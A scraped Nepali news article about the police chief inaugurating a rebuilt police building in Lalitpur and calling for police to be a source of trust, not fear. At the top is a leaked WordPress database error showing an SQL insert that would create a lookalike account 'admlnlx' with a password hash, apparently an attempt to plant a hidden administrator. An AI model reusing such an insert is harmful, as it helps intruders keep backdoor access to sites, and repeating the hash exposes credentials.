WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bfd4/jsBz4E3x.Gaa8TkEZv9sJpm/a0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 23:40:31', '', 'admlnlx', 'admlnlx')
ललितपुर ,पुस ११-
प्रहरी महानिरीक्षक उपेन्द्रकान्त अर्यालले अबको प्रहरी त्रासको हैन भरोसाको केन्द्रविन्दु बन्न सक्नुपर्ने बताएका छन् ।सोमबार ललितपुरस्थित महानगरीय प्रहरी प्रभाग मंगलबजारको नव निर्मीत भवन उद्घाटन गर्दै उनले यस्तो बताएका हुन् ।
‘अबको प्रहरी त्रास हैन भरोसाको केन्द्रविन्दु बन्न सक्नुपर्छ’ उनले भने, ‘अब त्रासमा बाँच्ने पालो गुण्डाको हो ।’प्रहरीले अपराधीलाई मात्र त्रास सिर्जना गर्नुपर्ने उल्लेख गर्दै अर्यालले जनतासँगको सम्वन्ध बिना प्रहरी अनुसन्धान सफल नहुने बताए ।
‘अब हिजोको जस्तो सर्वसाधारण त्रासमा बस्नुपर्दैन’ उनले भने, ‘शान्ति सुरक्षा प्रभावकारी बनाउन हामी नागरीक केन्द्रित अभियान चलाईरहेका छौं ।’भुकम्प पछि ध्वस्त बनेको मंगलबजारको प्रहरी भवन स्थानीय र प्रहरीको सहकार्यमा सम्पन्न भएको छ ।
पुरातत्व विभागले उपलब्ध गराएको जग्गामा साढे १८ लाखको लागतमा भवन निर्माण सम्पन्न भएको निर्माण समितिका संयोजक अजरमान जोशीले जानकारी दिए ।